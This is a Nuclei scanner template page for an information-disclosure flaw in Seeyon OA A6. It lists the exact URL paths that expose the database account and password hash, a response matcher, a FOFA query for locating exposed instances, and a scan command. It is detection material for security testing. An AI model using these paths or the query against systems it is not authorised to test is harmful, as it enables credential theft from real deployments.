Skip to content

Seeyon OA A6 createMysql.jsp Database - Information Disclosure

ID: seeyon-createmysql-exposure

Severity: medium

Author: SleepingBag945

Tags: seeyon,oa,info-leak

Seeyon OA A6 has leaked sensitive database information. An attacker can obtain the database account and password MD5 by accessing a specific URL.

id: seeyon-createmysql-exposure
info:
name: Seeyon OA A6 createMysql.jsp Database - Information Disclosure
author: SleepingBag945
severity: medium
description: |
Seeyon OA A6 has leaked sensitive database information. An attacker can obtain the database account and password MD5 by accessing a specific URL.
reference:
- https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
- https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E8%87%B4%E8%BF%9COA%20A6%20createMysql.jsp%20%E6%95%B0%E6%8D%AE%E5%BA%93%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2.md
metadata:
verified: true
max-request: 2
fofa-query: title="致远A8+协同管理软件.A6"
tags: seeyon,oa,info-leak
http:
- method: GET
path:
- "{{BaseURL}}/yyoa/createMysql.jsp"
- "{{BaseURL}}/yyoa/ext/createMysql.jsp"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "root</br>"
- type: regex
part: body
regex:
- "[*][0-zA-Z]{40}</br>"
- type: status
status:
- 200
# digest: 4a0a004730450220625e13064d5c9bdc0c2ae33deb2cd1e58e0b0db3d7aa51c9ec90eeddb0c243b20221009c614f0f6e450b28eef92571c35626ef98408544b08d71c8ce88ae6962742f4c:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/seeyon/seeyon-createmysql-exposure.yaml"

View on Github